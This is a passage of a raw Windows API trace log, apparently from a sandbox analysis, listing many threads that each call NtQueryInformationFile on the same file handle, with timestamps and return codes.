os_tid = 0x5d8 [0163.364] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf850, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf850, FileInformation=0x210e20) returned 0x0 Thread: id = 1066 os_tid = 0x69c [0163.366] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35fff20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35fff20, FileInformation=0x210e20) returned 0x0 Thread: id = 1067 os_tid = 0x6a8 [0163.371] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fd30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fd30, FileInformation=0x210e20) returned 0x0 Thread: id = 1068 os_tid = 0x500 [0163.373] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fa08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fa08, FileInformation=0x210e20) returned 0x0 Thread: id = 1069 os_tid = 0x4e0 [0163.375] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bff58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bff58, FileInformation=0x210e20) returned 0x0 Thread: id = 1070 os_tid = 0x330 [0163.377] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fa48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fa48, FileInformation=0x210e20) returned 0x0 Thread: id = 1071 os_tid = 0xa30 [0163.379] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df908, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df908, FileInformation=0x210e20) returned 0x0 Thread: id = 1072 os_tid = 0xb50 [0163.381] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfc70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfc70, FileInformation=0x210e20) returned 0x0 Thread: id = 1073 os_tid = 0xb70 [0163.383] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fbf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fbf8, FileInformation=0x210e20) returned 0x0 Thread: id = 1074 os_tid = 0xb6c [0163.386] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfa78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfa78, FileInformation=0x210e20) returned 0x0 Thread: id = 1075 os_tid = 0xb74 [0163.392] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dff38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dff38, FileInformation=0x210e20) returned 0x0 Thread: id = 1076 os_tid = 0xb68 [0163.395] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f980, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f980, FileInformation=0x210e20) returned 0x0 Thread: id = 1077 os_tid = 0x758 [0163.398] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f960, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f960, FileInformation=0x210e20) returned 0x0 Thread: id = 1078 os_tid = 0x3d4 [0163.404] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f838, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f838, FileInformation=0x210e20) returned 0x0 Thread: id = 1079 os_tid = 0x484 [0163.407] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfa00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfa00, FileInformation=0x210e20) returned 0x0 Thread: id = 1080 os_tid = 0xb4c [0163.409] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfb30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfb30, FileInformation=0x210e20) returned 0x0 Thread: id = 1081 os_tid = 0xa1c [0163.414] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fe60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fe60, FileInformation=0x210e20) returned 0x0 Thread: id = 1082 os_tid = 0x2ac [0163.421] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff880, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff880, FileInformation=0x210e20) returned 0x0 Thread: id = 1083 os_tid = 0xa8c [0163.423] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffbd0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffbd0, FileInformation=0x210e20) returned 0x0 Thread: id = 1084 os_tid = 0x68c [0163.425] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f7b8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f7b8, FileInformation=0x210e20) returned 0x0 Thread: id = 1085 os_tid = 0x388 [0163.427] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf870, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf870, FileInformation=0x210e20) returned 0x0 Thread: id = 1086 os_tid = 0xa50 [0163.431] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfaa0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfaa0, FileInformation=0x210e20) returned 0x0 Thread: id = 1087 os_tid = 0x75c [0163.434] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df850, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df850, FileInformation=0x210e20) returned 0x0 Thread: id = 1088 os_tid = 0x240 [0163.435] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fe90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fe90, FileInformation=0x210e20) returned 0x0 Thread: id = 1089 os_tid = 0x320 [0163.437] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dff48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dff48, FileInformation=0x210e20) returned 0x0 Thread: id = 1090 os_tid = 0x3b4 [0163.439] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfe10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfe10, FileInformation=0x210e20) returned 0x0 Thread: id = 1091 os_tid = 0x760 [0163.441] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fbb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fbb8, FileInformation=0x210e20) returned 0x0 Thread: id = 1092 os_tid = 0xb00 [0163.443] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f960, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f960, FileInformation=0x210e20) returned 0x0 Thread: id = 1093 os_tid = 0x7fc [0163.445] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fd60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fd60, FileInformation=0x210e20) returned 0x0 Thread: id = 1094 os_tid = 0xb18 [0163.447] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fc38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fc38, FileInformation=0x210e20) returned 0x0 Thread: id = 1095 os_tid = 0xa68 [0163.449] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fcb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fcb0, FileInformation=0x210e20) returned 0x0 Thread: id = 1096 os_tid = 0x224 [0163.451] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df848, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df848, FileInformation=0x210e20) returned 0x0 Thread: id = 1097 os_tid = 0x2c4 [0163.453] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fb60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fb60, FileInformation=0x210e20) returned 0x0 Thread: id = 1098 os_tid = 0x24c [0163.457] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffd28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffd28, FileInformation=0x210e20) returned 0x0 Thread: id = 1099 os_tid = 0x4e8 [0163.460] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fc08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fc08, FileInformation=0x210e20) returned 0x0 Thread: id = 1100 os_tid = 0x220 [0163.463] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fb90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fb90, FileInformation=0x210e20) returned 0x0 Thread: id = 1101 os_tid = 0xb04 [0163.465] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f878, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f878, FileInformation=0x210e20) returned 0x0 Thread: id = 1102 os_tid = 0x180 [0163.467] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfa58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfa58, FileInformation=0x210e20) returned 0x0 Thread: id = 1103 os_tid = 0x53c [0163.469] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fb20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fb20, FileInformation=0x210e20) returned 0x0 Thread: id = 1104 os_tid = 0x5b4 [0163.471] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f880, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f880, FileInformation=0x210e20) returned 0x0 Thread: id = 1105 os_tid = 0x614 [0163.473] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fca8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fca8, FileInformation=0x210e20) returned 0x0 Thread: id = 1106 os_tid = 0x690 [0163.475] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fc80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fc80, FileInformation=0x210e20) returned 0x0 Thread: id = 1107 os_tid = 0x440 [0163.477] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fe78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fe78, FileInformation=0x210e20) returned 0x0 Thread: id = 1108 os_tid = 0x7d8 [0163.479] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fc58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fc58, FileInformation=0x210e20) returned 0x0 Thread: id = 1109 os_tid = 0xa60 [0163.481] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfd58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfd58, FileInformation=0x210e20) returned 0x0 Thread: id = 1110 os_tid = 0xb24 [0163.485] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fe30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fe30, FileInformation=0x210e20) returned 0x0 Thread: id = 1111 os_tid = 0x878 [0163.487] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f8c0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f8c0, FileInformation=0x210e20) returned 0x0 Thread: id = 1112 os_tid = 0xb1c [0163.489] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df900, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df900, FileInformation=0x210e20) returned 0x0 Thread: id = 1113 os_tid = 0xb08 [0163.491] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363feb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363feb0, FileInformation=0x210e20) returned 0x0 Thread: id = 1114 os_tid = 0x4fc [0163.493] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fe68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fe68, FileInformation=0x210e20) returned 0x0 Thread: id = 1115 os_tid = 0x4dc [0163.495] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfc58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfc58, FileInformation=0x210e20) returned 0x0 Thread: id = 1116 os_tid = 0x43c [0163.497] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f8d0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f8d0, FileInformation=0x210e20) returned 0x0 Thread: id = 1117 os_tid = 0x1c4 [0163.500] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfe30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfe30, FileInformation=0x210e20) returned 0x0 Thread: id = 1118 os_tid = 0xbec [0163.502] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fd60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fd60, FileInformation=0x210e20) returned 0x0 Thread: id = 1119 os_tid = 0xb48 [0163.504] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfe70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfe70, FileInformation=0x210e20) returned 0x0 Thread: id = 1120 os_tid = 0x5bc [0163.505] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfb70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfb70, FileInformation=0x210e20) returned 0x0 Thread: id = 1121 os_tid = 0x6b8 [0163.510] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fe10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fe10, FileInformation=0x210e20) returned 0x0 Thread: id = 1122 os_tid = 0x2dc [0163.512] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f968, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f968, FileInformation=0x210e20) returned 0x0 Thread: id = 1123 os_tid = 0x158 [0163.514] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fcb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fcb8, FileInformation=0x210e20) returned 0x0 Thread: id = 1124 os_tid = 0x6cc [0163.516] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f7b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f7b0, FileInformation=0x210e20) returned 0x0 Thread: id = 1125 os_tid = 0x694 [0163.518] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fc50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fc50, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1126 os_tid = 0x6d8 [0163.520] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fad8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fad8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1127 os_tid = 0x87c [0163.522] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfd38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfd38, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1128 os_tid = 0xb88 [0163.524] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fa80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fa80, FileInformation=0x210e20) returned 0x0 Thread: id = 1129 os_tid = 0xb8c [0163.526] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fb90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fb90, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1130 os_tid = 0x700 [0163.528] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f788, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f788, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1131 os_tid = 0x6f0 [0163.530] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfba0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfba0, FileInformation=0x210e20) returned 0x0 Thread: id = 1132 os_tid = 0x130 [0163.532] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffd90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffd90, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1133 os_tid = 0x754 [0163.534] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f9c0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f9c0, FileInformation=0x210e20) returned 0x0 Thread: id = 1134 os_tid = 0x72c [0163.536] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffc80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffc80, FileInformation=0x210e20) returned 0x0 Thread: id = 1135 os_tid = 0x748 [0163.538] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfed8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfed8, FileInformation=0x210e20) returned 0x0 Thread: id = 1136 os_tid = 0x928 [0163.540] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fa70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fa70, FileInformation=0x210e20) returned 0x0 Thread: id = 1137 os_tid = 0xcc [0163.542] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f868, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f868, FileInformation=0x210e20) returned 0x0 Thread: id = 1138 os_tid = 0xd0 [0163.544] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfef0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfef0, FileInformation=0x210e20) returned 0x0 Thread: id = 1139 os_tid = 0xd4 [0163.546] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369ff78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369ff78, FileInformation=0x210e20) returned 0x0 Thread: id = 1140 os_tid = 0xd8 [0163.548] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fdf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fdf8, FileInformation=0x210e20) returned 0x0 Thread: id = 1141 os_tid = 0xdc [0163.550] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fd50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fd50, FileInformation=0x210e20) returned 0x0 Thread: id = 1142 os_tid = 0xe0 [0163.551] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffa98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffa98, FileInformation=0x210e20) returned 0x0 Thread: id = 1143 os_tid = 0xe4 [0163.553] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fd68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fd68, FileInformation=0x210e20) returned 0x0 Thread: id = 1144 os_tid = 0xe8 [0163.555] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfab8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfab8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1145 os_tid = 0xec [0163.557] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373ff08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373ff08, FileInformation=0x210e20) returned 0x0 Thread: id = 1146 os_tid = 0x9d8 [0163.559] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff7e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff7e8, FileInformation=0x210e20) returned 0x0 Thread: id = 1147 os_tid = 0x898 [0163.561] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fd38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fd38, FileInformation=0x210e20) returned 0x0 Thread: id = 1148 os_tid = 0x48c [0163.562] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfea8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfea8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1149 os_tid = 0x6a4 [0163.564] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f850, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f850, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1150 os_tid = 0x20c [0163.567] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f920, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f920, FileInformation=0x210e20) returned 0x0 Thread: id = 1151 os_tid = 0x704 [0163.568] NtQueryInformationFile (FileHandle=0x194, IoStatusBlock=0x35bfd38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9) Thread: id = 1152 os_tid = 0x568 [0163.826] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fd00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fd00, FileInformation=0x210e20) returned 0x0 Thread: id = 1153 os_tid = 0x5ac [0163.828] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf800, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf800, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1154 os_tid = 0x908 [0163.830] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375ff38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375ff38, FileInformation=0x210e20) returned 0x0 Thread: id = 1155 os_tid = 0x888 [0163.832] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfab0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfab0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1156 os_tid = 0x544 [0163.834] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f9f0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f9f0, FileInformation=0x210e20) returned 0x0 Thread: id = 1157 os_tid = 0x76c [0163.836] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf7f0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf7f0, FileInformation=0x210e20) returned 0x0 Thread: id = 1158 os_tid = 0xa9c [0163.838] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f870, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f870, FileInformation=0x210e20) returned 0x0 Thread: id = 1159 os_tid = 0x114 [0163.840] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfbc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfbc8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1160 os_tid = 0x5b8 [0163.844] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffcb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffcb0, FileInformation=0x210e20) returned 0x0 Thread: id = 1161 os_tid = 0x814 [0163.846] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fe60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fe60, FileInformation=0x210e20) returned 0x0 Thread: id = 1162 os_tid = 0x834 [0163.848] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfed0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfed0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1163 os_tid = 0x884 [0163.850] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfbc0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfbc0, FileInformation=0x210e20) returned 0x0 Thread: id = 1164 os_tid = 0x5d4 [0163.856] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fb50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fb50, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1165 os_tid = 0x340 [0163.876] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfb40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfb40, FileInformation=0x210e20) returned 0x0 Thread: id = 1166 os_tid = 0x810 [0163.878] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffc68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffc68, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1167 os_tid = 0x830 [0163.880] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffed8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffed8, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1168 os_tid = 0x880 [0163.881] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bff10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bff10, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1169 os_tid = 0xae4 [0163.883] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fcd0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fcd0, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1170 os_tid = 0x570 [0163.885] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df7d8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df7d8, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1171 os_tid = 0xb40 [0163.887] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfb20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfb20, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1172 os_tid = 0x5f4 [0163.889] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff808, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff808, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1173 os_tid = 0xbb8 [0163.891] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df950, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df950, FileInformation=0x210e20) returned 0xc000000d Thread: id = 1174 os_tid = 0x598 [0163.892] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fe28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fe28, 